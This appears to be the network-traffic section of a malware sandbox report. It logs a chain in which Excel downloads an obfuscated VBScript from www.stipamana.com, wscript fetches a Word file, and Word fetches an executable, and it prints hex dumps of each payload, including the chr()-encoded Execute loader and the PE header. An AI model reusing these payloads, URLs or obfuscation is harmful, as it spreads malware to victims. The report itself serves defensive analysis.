                                              Dec 14, 2024 13:53:02.514375925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514375925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.621838093 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.621896029 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.622162104 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.622178078 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.622220993 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.622220993 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.631345987 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.631397963 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.631447077 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.631447077 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.631464958 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.631634951 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.640989065 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.641035080 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.641096115 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.641096115 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.641115904 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.641155005 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.641155005 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650296926 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.650346041 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.650414944 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650414944 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650428057 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.650734901 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650859118 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.658932924 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.658984900 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.659044027 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.659064054 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.659101963 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.659101963 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.659336090 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660108089 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.660200119 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.660270929 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660270929 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660284042 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.660335064 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660335064 CET49163443192.168.2.2287.121.86.205

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 14, 2024 13:51:51.646564960 CET5456253192.168.2.228.8.8.8
                                              Dec 14, 2024 13:51:52.027609110 CET53545628.8.8.8192.168.2.22
                                              Dec 14, 2024 13:51:54.914802074 CET5291753192.168.2.228.8.8.8
                                              Dec 14, 2024 13:51:55.288136959 CET53529178.8.8.8192.168.2.22
                                              Dec 14, 2024 13:51:55.460273981 CET6275153192.168.2.228.8.8.8
                                              Dec 14, 2024 13:51:55.833941936 CET53627518.8.8.8192.168.2.22
                                              Dec 14, 2024 13:52:59.400036097 CET5789353192.168.2.228.8.8.8
                                              Dec 14, 2024 13:52:59.770945072 CET53578938.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 14, 2024 13:51:51.646564960 CET192.168.2.228.8.8.80xcaecStandard query (0)www.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 14, 2024 13:51:54.914802074 CET192.168.2.228.8.8.80xbef0Standard query (0)www.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 14, 2024 13:51:55.460273981 CET192.168.2.228.8.8.80x1e9Standard query (0)www.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 14, 2024 13:52:59.400036097 CET192.168.2.228.8.8.80xd132Standard query (0)www.stipamana.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 14, 2024 13:51:52.027609110 CET8.8.8.8192.168.2.220xcaecNo error (0)www.stipamana.com87.121.86.205A (IP address)IN (0x0001)false
                                              Dec 14, 2024 13:51:55.288136959 CET8.8.8.8192.168.2.220xbef0No error (0)www.stipamana.com87.121.86.205A (IP address)IN (0x0001)false
                                              Dec 14, 2024 13:51:55.833941936 CET8.8.8.8192.168.2.220x1e9No error (0)www.stipamana.com87.121.86.205A (IP address)IN (0x0001)false
                                              Dec 14, 2024 13:52:59.770945072 CET8.8.8.8192.168.2.220xd132No error (0)www.stipamana.com87.121.86.205A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.stipamana.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916187.121.86.2054433168C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-12-14 12:51:53 UTC414OUTGET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: www.stipamana.com
                                              Connection: Keep-Alive
                                              2024-12-14 12:51:54 UTC209INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 14 Dec 2024 12:51:54 GMT
                                              Content-Length: 10232
                                              Connection: close
                                              Last-Modified: Sat, 14 Dec 2024 08:57:05 GMT
                                              ETag: "27f8-6293721aa1a40"
                                              Accept-Ranges: bytes
                                              2024-12-14 12:51:54 UTC10232INData Raw: 45 78 65 63 75 74 65 28 63 68 72 28 36 32 32 35 2f 37 35 29 26 20 63 68 72 28 31 35 34 2d 35 33 29 26 20 63 68 72 28 31 30 34 34 30 2f 39 30 29 26 20 63 68 72 28 31 32 37 2d 39 35 29 26 20 63 68 72 28 37 33 2b 33 38 29 26 20 63 68 72 28 31 36 39 2d 37 31 29 26 20 63 68 72 28 31 33 2b 39 33 29 26 20 63 68 72 28 32 35 2b 36 32 29 26 20 63 68 72 28 31 32 36 30 2f 31 32 29 26 20 63 68 72 28 33 36 2b 37 34 29 26 20 63 68 72 28 31 34 35 2d 37 33 29 26 20 63 68 72 28 36 36 2b 35 30 29 26 20 63 68 72 28 36 31 2b 35 35 29 26 20 63 68 72 28 32 30 36 2d 39 34 29 26 20 63 68 72 28 35 39 2d 32 37 29 26 20 63 68 72 28 31 30 30 2d 33 39 29 26 20 63 68 72 28 39 39 2d 36 37 29 26 20 63 68 72 28 38 35 2d 31 38 29 26 20 63 68 72 28 31 30 30 2b 31 34 29 26 20 63 68 72 28 38
                                              Data Ascii: Execute(chr(6225/75)& chr(154-53)& chr(10440/90)& chr(127-95)& chr(73+38)& chr(169-71)& chr(13+93)& chr(25+62)& chr(1260/12)& chr(36+74)& chr(145-73)& chr(66+50)& chr(61+55)& chr(206-94)& chr(59-27)& chr(100-39)& chr(99-67)& chr(85-18)& chr(100+14)& chr(8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.224916287.121.86.2054433404C:\Windows\System32\wscript.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-14 12:51:57 UTC277OUTGET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: text/plain; Charset=UTF-8
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                              Host: www.stipamana.com
                                              2024-12-14 12:51:57 UTC312INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 14 Dec 2024 12:51:57 GMT
                                              Content-Type: application/msword
                                              Content-Length: 37888
                                              Last-Modified: Sat, 14 Dec 2024 08:47:41 GMT
                                              Connection: close
                                              ETag: "675d462d-9400"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              Accept-Ranges: bytes
                                              2024-12-14 12:51:57 UTC16072INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 27 00 00 00 00 00 00 00 00 10 00 00 29 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 26 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                              Data Ascii: >')&
                                              2024-12-14 12:51:57 UTC16384INData Raw: 00 00 0e 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 01 00 00 00 01 00 00 00 00 0c 10 00 00 02 00 00 00 1e 00 00 00 06 00 00 00 54 69 74 6c 65 00 03 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: Title
                                              2024-12-14 12:51:57 UTC5432INData Raw: ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff
                                              Data Ascii: "r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.224916387.121.86.2054433460C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-12-14 12:53:01 UTC417OUTGET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: www.stipamana.com
                                              Connection: Keep-Alive
                                              2024-12-14 12:53:01 UTC320INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 14 Dec 2024 12:53:01 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 395776
                                              Last-Modified: Sat, 14 Dec 2024 07:15:43 GMT
                                              Connection: close
                                              ETag: "675d309f-60a00"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              Accept-Ranges: bytes
                                              2024-12-14 12:53:01 UTC16064INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae 01 5b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f8 05 00 00 10 00 00 00 00 00 00 2e 17 06 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 06 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL[gP. @ ``
                                              2024-12-14 12:53:01 UTC16384INData Raw: 0c 1e 00 20 0a 00 00 00 7f 39 00 00 04 d3 20 0a 00 00 00 58 47 69 20 7a 00 00 00 61 9d fe 0c 1e 00 20 0b 00 00 00 20 d6 00 00 00 20 a2 00 00 00 61 9d fe 0c 1e 00 20 0c 00 00 00 20 d2 00 00 00 20 86 00 00 00 61 9d fe 0c 1e 00 20 0d 00 00 00 20 6d 00 00 00 20 05 00 00 00 61 9d fe 0c 1e 00 20 0e 00 00 00 20 28 00 00 00 20 5a 00 00 00 61 9d fe 0c 1e 00 20 0f 00 00 00 20 27 00 00 00 20 42 00 00 00 61 9d fe 0c 1e 00 20 10 00 00 00 20 7e 00 00 00 20 1f 00 00 00 61 9d fe 0c 1e 00 20 11 00 00 00 20 1a 00 00 00 20 7e 00 00 00 61 9d 73 17 00 00 0a 28 0e 00 00 2b fe 0e 13 00 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 97 fe 0c 09 00 6f 51 00 00 06 26 fe 0c 12 00 fe 0c 05 00 20 00 00 00 00 97 fe 0c 09 00 20 29 00 00 00 95 6e 20 08 00 00 00 6a d6 28 36 00 00 0a fe 0d 0d 00
                                              Data Ascii: 9 XGi za a a m a ( Za ' Ba ~ a ~as(+ oQ& )n j(6
                                              2024-12-14 12:53:02 UTC16384INData Raw: 00 00 61 9d fe 0c 09 00 20 11 00 00 00 7f 72 00 00 04 d3 20 11 00 00 00 58 47 69 20 48 00 00 00 61 9d fe 0c 09 00 20 12 00 00 00 7f 72 00 00 04 d3 20 12 00 00 00 58 47 69 20 49 00 00 00 61 9d fe 0c 09 00 20 13 00 00 00 7f 72 00 00 04 d3 20 13 00 00 00 58 47 69 20 2b 00 00 00 61 9d fe 0c 09 00 20 14 00 00 00 7f 72 00 00 04 d3 20 14 00 00 00 58 47 69 20 d4 00 00 00 61 9d fe 0c 09 00 20 15 00 00 00 7f 72 00 00 04 d3 20 15 00 00 00 58 47 69 20 5c 00 00 00 61 9d fe 0c 09 00 20 16 00 00 00 7f 72 00 00 04 d3 20 16 00 00 00 58 47 69 20 23 00 00 00 61 9d fe 0c 09 00 20 17 00 00 00 20 eb 00 00 00 20 cc 00 00 00 61 9d fe 0c 09 00 20 18 00 00 00 7f 72 00 00 04 d3 20 18 00 00 00 58 47 69 20 9a 00 00 00 61 9d fe 0c 09 00 20 19 00 00 00 7f 72 00 00 04 d3 20 19 00 00 00
                                              Data Ascii: a r XGi Ha r XGi Ia r XGi +a r XGi a r XGi \a r XGi #a a r XGi a r
                                              2024-12-14 12:53:02 UTC16384INData Raw: 59 35 76 69 6d 44 43 45 6c 43 36 65 30 49 67 38 53 6b 7a 61 56 34 33 32 67 38 6b 59 4d 6a 72 39 32 69 64 48 58 66 50 64 52 79 43 75 52 56 6a 50 50 47 4d 74 6e 4b 66 51 75 50 49 69 51 4d 73 68 33 46 56 34 67 7a 74 4a 37 64 79 75 6f 42 4b 2f 62 72 4f 6c 38 44 66 71 6b 47 32 4c 2b 61 6d 46 62 35 2b 42 37 49 7a 43 4d 46 47 4c 48 75 62 4a 6f 45 48 36 67 39 68 30 72 79 6c 6a 54 6b 71 32 64 55 4e 78 58 56 39 7a 74 69 6e 43 38 37 4a 75 38 65 76 79 66 68 66 76 77 72 30 6a 4e 75 79 34 4a 75 78 44 61 65 6e 6c 5a 33 43 72 74 35 53 6c 59 7a 37 4b 49 76 78 35 42 74 51 6d 6f 59 35 76 31 77 2b 46 69 54 70 31 65 31 53 50 74 34 44 4e 33 6d 2b 6c 42 61 43 45 46 74 33 49 5a 4f 6b 48 61 74 69 56 68 6a 48 53 46 6f 47 66 50 4a 63 68 55 61 6c 41 44 47 45 52 4e 63 4c 4d 76 2b 6a
                                              Data Ascii: Y5vimDCElC6e0Ig8SkzaV432g8kYMjr92idHXfPdRyCuRVjPPGMtnKfQuPIiQMsh3FV4gztJ7dyuoBK/brOl8DfqkG2L+amFb5+B7IzCMFGLHubJoEH6g9h0ryljTkq2dUNxXV9ztinC87Ju8evyfhfvwr0jNuy4JuxDaenlZ3Crt5SlYz7KIvx5BtQmoY5v1w+FiTp1e1SPt4DN3m+lBaCEFt3IZOkHatiVhjHSFoGfPJchUalADGERNcLMv+j
                                              2024-12-14 12:53:02 UTC16384INData Raw: 35 79 31 7a 4c 4b 65 74 2b 57 69 4c 6d 7a 72 30 30 6f 77 58 43 41 35 62 5a 2b 31 36 68 66 55 6c 47 6d 62 64 52 48 43 70 4f 4b 6a 5a 4a 76 77 56 4f 39 2b 44 30 57 63 70 6d 47 33 6f 71 46 75 75 4f 67 56 37 50 63 79 6b 63 36 55 71 6d 68 62 63 76 69 49 4c 38 57 45 66 33 69 47 58 48 69 74 6e 4d 4a 44 47 55 61 67 69 39 75 48 74 4d 2f 58 35 6f 72 50 47 6f 51 79 65 30 6c 71 37 35 36 6e 7a 65 75 64 38 37 77 72 46 4b 70 63 30 2f 6d 78 69 4a 34 6b 72 2f 6b 65 55 4e 58 47 63 66 4c 76 4e 30 34 42 44 54 54 7a 6c 71 4e 55 44 57 75 4a 58 57 30 42 68 52 63 34 76 4f 67 47 51 43 6d 57 61 69 41 39 50 36 53 6c 4b 6a 46 4f 59 77 54 4e 6b 4c 64 77 69 38 51 78 2f 47 47 5a 46 50 46 44 4e 79 4f 4d 68 54 53 58 6d 6a 30 2b 64 7a 61 4d 4a 59 44 69 31 4a 46 45 6e 70 7a 31 57 4f 4e 47
                                              Data Ascii: 5y1zLKet+WiLmzr00owXCA5bZ+16hfUlGmbdRHCpOKjZJvwVO9+D0WcpmG3oqFuuOgV7Pcykc6UqmhbcviIL8WEf3iGXHitnMJDGUagi9uHtM/X5orPGoQye0lq756nzeud87wrFKpc0/mxiJ4kr/keUNXGcfLvN04BDTTzlqNUDWuJXW0BhRc4vOgGQCmWaiA9P6SlKjFOYwTNkLdwi8Qx/GGZFPFDNyOMhTSXmj0+dzaMJYDi1JFEnpz1WONG
                                              2024-12-14 12:53:02 UTC16384INData Raw: 43 36 56 63 57 57 56 35 74 4c 67 52 6b 33 2f 73 57 65 66 2f 55 57 64 4b 44 39 39 73 53 77 66 78 78 38 70 4e 71 48 73 64 71 73 2b 2f 31 46 69 49 45 47 50 6e 75 72 65 4b 37 4a 7a 58 37 63 31 56 6e 56 64 68 51 75 74 62 63 4c 67 50 4e 50 32 2b 6c 69 4c 76 61 69 66 6a 4d 6f 70 56 59 6e 4d 4d 31 62 72 7a 49 36 52 43 31 71 37 79 59 6d 59 48 42 45 6c 4a 30 56 6e 2f 32 38 5a 47 59 46 4f 4e 4a 58 5a 79 36 51 65 6f 33 78 31 54 74 78 61 77 4f 75 75 35 71 76 46 6b 57 6d 68 4b 7a 42 63 42 5a 6e 41 37 6f 6b 35 2f 4a 71 54 62 48 76 46 55 51 2f 64 55 44 37 74 6c 65 4c 70 71 37 37 76 49 56 70 6f 4c 71 45 50 52 79 6c 75 78 53 75 63 32 71 34 50 30 2b 37 41 72 2b 35 65 54 63 6e 41 72 58 56 41 2f 68 6c 64 4f 58 35 53 4c 63 6e 49 36 6b 42 78 2b 6b 51 2b 39 2b 70 4e 63 69 77 61
                                              Data Ascii: C6VcWWV5tLgRk3/sWef/UWdKD99sSwfxx8pNqHsdqs+/1FiIEGPnureK7JzX7c1VnVdhQutbcLgPNP2+liLvaifjMopVYnMM1brzI6RC1q7yYmYHBElJ0Vn/28ZGYFONJXZy6Qeo3x1TtxawOuu5qvFkWmhKzBcBZnA7ok5/JqTbHvFUQ/dUD7tleLpq77vIVpoLqEPRyluxSuc2q4P0+7Ar+5eTcnArXVA/hldOX5SLcnI6kBx+kQ+9+pNciwa
                                              2024-12-14 12:53:02 UTC16384INData Raw: 4b 74 70 69 41 78 51 34 49 4d 4a 4f 39 67 45 73 72 6c 68 42 39 46 65 70 67 47 47 49 2b 78 53 2f 4a 50 68 5a 38 59 70 70 31 41 6a 5a 4f 63 66 63 75 52 49 5a 43 57 4e 74 63 66 6e 73 35 4b 53 4d 37 2f 49 72 35 63 73 45 5a 67 5a 4e 56 6e 63 34 6a 31 67 66 6d 4f 2b 76 4c 49 63 4f 49 4e 31 65 46 43 33 31 4a 46 78 44 6d 6e 57 4b 72 57 45 77 58 36 47 4e 2f 77 49 61 66 36 76 42 38 57 33 39 41 50 6a 78 5a 73 5a 6d 6a 6e 79 48 36 66 7a 79 4d 59 45 30 42 70 4d 53 65 79 75 65 50 46 50 46 6c 6c 57 64 55 73 50 2b 39 54 54 73 78 37 30 34 2b 69 35 43 62 4d 46 34 46 34 41 53 4e 48 47 36 2b 38 33 57 54 34 54 41 44 66 49 76 56 57 6c 42 47 4c 38 6c 55 6c 45 42 41 66 63 32 4a 5a 68 78 41 34 43 4e 38 78 46 75 4b 75 66 6f 70 35 74 53 4f 72 73 4e 58 70 4c 73 56 55 47 74 33 78 77
                                              Data Ascii: KtpiAxQ4IMJO9gEsrlhB9FepgGGI+xS/JPhZ8Ypp1AjZOcfcuRIZCWNtcfns5KSM7/Ir5csEZgZNVnc4j1gfmO+vLIcOIN1eFC31JFxDmnWKrWEwX6GN/wIaf6vB8W39APjxZsZmjnyH6fzyMYE0BpMSeyuePFPFllWdUsP+9TTsx704+i5CbMF4F4ASNHG6+83WT4TADfIvVWlBGL8lUlEBAfc2JZhxA4CN8xFuKufop5tSOrsNXpLsVUGt3xw
                                              2024-12-14 12:53:02 UTC16384INData Raw: 44 6a 5a 6b 67 41 62 68 63 51 42 2f 6e 58 59 47 44 56 66 42 30 33 56 4b 47 47 73 31 52 38 71 2b 58 44 78 31 49 51 36 2b 6a 73 6c 4e 52 55 77 38 2f 39 55 62 73 57 4f 54 47 48 62 79 31 59 74 39 62 32 67 6d 35 61 77 64 51 73 64 65 70 62 38 43 58 57 2f 65 48 44 54 72 7a 6e 38 51 7a 52 58 67 75 67 30 4f 69 43 4c 76 70 48 78 32 4e 54 61 37 46 42 75 55 75 45 4a 4e 69 46 2b 52 34 2f 6d 66 6c 67 36 38 2b 5a 73 63 6c 43 68 71 4a 55 51 4f 58 4a 37 77 52 35 53 5a 44 6c 50 53 64 59 77 5a 4b 77 65 59 76 6e 43 2b 79 67 48 39 77 57 76 55 58 44 41 46 2f 5a 52 46 42 49 72 71 77 2f 43 53 75 43 71 2b 69 48 69 68 6c 41 61 71 7a 37 65 5a 48 66 58 4b 78 57 44 64 69 51 2f 69 42 43 6e 44 46 36 33 63 58 50 50 75 4c 73 2f 39 50 51 32 64 76 76 77 45 77 62 4a 79 7a 36 48 55 72 78 59
                                              Data Ascii: DjZkgAbhcQB/nXYGDVfB03VKGGs1R8q+XDx1IQ6+jslNRUw8/9UbsWOTGHby1Yt9b2gm5awdQsdepb8CXW/eHDTrzn8QzRXgug0OiCLvpHx2NTa7FBuUuEJNiF+R4/mflg68+ZsclChqJUQOXJ7wR5SZDlPSdYwZKweYvnC+ygH9wWvUXDAF/ZRFBIrqw/CSuCq+iHihlAaqz7eZHfXKxWDdiQ/iBCnDF63cXPPuLs/9PQ2dvvwEwbJyz6HUrxY
                                              2024-12-14 12:53:02 UTC16384INData Raw: 77 46 49 52 6e 5a 6a 7a 48 4c 6a 4d 65 4a 50 43 43 6c 30 56 42 35 5a 52 5a 2b 76 55 62 31 41 79 6d 33 42 37 70 67 49 6b 77 35 4f 72 31 4b 31 48 46 67 38 63 7a 46 30 4e 79 54 47 6a 37 62 52 4a 4f 38 71 34 54 4c 34 73 49 55 6b 53 45 67 56 6b 54 41 34 4c 58 30 68 36 72 79 64 77 79 33 74 58 44 73 34 32 76 30 35 6a 67 36 79 4a 49 2f 47 46 4f 6f 30 68 43 69 78 43 4f 76 36 6f 4b 59 2b 74 4b 35 4c 54 63 48 4c 76 6b 51 37 57 36 39 62 45 52 67 35 58 52 6d 75 31 42 52 39 65 42 6b 6f 5a 7a 4f 68 64 35 37 6f 62 72 4c 76 4a 73 75 2f 59 35 39 33 30 78 72 33 64 58 67 74 68 62 51 36 56 71 34 2b 32 6f 49 67 34 69 6d 56 6c 62 46 68 6b 50 4a 56 6a 51 64 34 54 59 6d 67 57 63 41 4e 6a 6b 35 5a 54 6c 53 43 55 36 74 4c 47 6d 6a 2b 6a 50 6e 4a 6b 39 34 32 74 48 65 65 36 47 36 79
                                              Data Ascii: wFIRnZjzHLjMeJPCCl0VB5ZRZ+vUb1Aym3B7pgIkw5Or1K1HFg8czF0NyTGj7bRJO8q4TL4sIUkSEgVkTA4LX0h6rydwy3tXDs42v05jg6yJI/GFOo0hCixCOv6oKY+tK5LTcHLvkQ7W69bERg5XRmu1BR9eBkoZzOhd57obrLvJsu/Y5930xr3dXgthbQ6Vq4+2oIg4imVlbFhkPJVjQd4TYmgWcANjk5ZTlSCU6tLGmj+jPnJk942tHee6G6y
                                              2024-12-14 12:53:02 UTC16384INData Raw: 57 43 41 35 79 2b 74 45 37 31 65 77 6b 6b 75 68 45 2f 76 4b 45 6f 33 51 69 70 6b 76 2b 64 4a 66 61 35 32 53 51 75 46 6d 70 4d 74 4a 4d 44 52 4a 41 58 69 32 6f 54 6c 6f 55 52 6b 72 49 69 68 61 63 2b 46 71 30 50 34 64 35 63 2b 63 62 7a 68 58 56 2b 71 4e 47 61 4b 6d 78 5a 69 4c 73 42 64 54 6d 32 54 35 41 4c 58 75 42 59 51 36 53 44 64 6a 4a 42 62 39 76 65 34 48 4e 6f 49 35 33 4f 70 4e 48 4f 30 79 57 58 55 55 69 69 69 44 58 4c 7a 4b 6d 4a 7a 43 46 44 63 2f 30 6a 41 67 53 50 42 62 56 7a 39 4a 72 49 47 39 75 45 76 44 4e 76 34 4a 59 69 78 62 50 68 6a 4b 37 65 4a 2b 78 46 43 36 49 74 4a 78 74 42 68 33 48 35 6b 4b 43 59 73 56 70 61 35 55 70 6e 42 54 34 77 43 45 33 74 39 64 4f 6b 59 6f 31 52 63 56 34 78 31 6c 36 37 5a 52 4d 61 4d 6a 4a 62 54 39 44 79 38 49 47 50 52
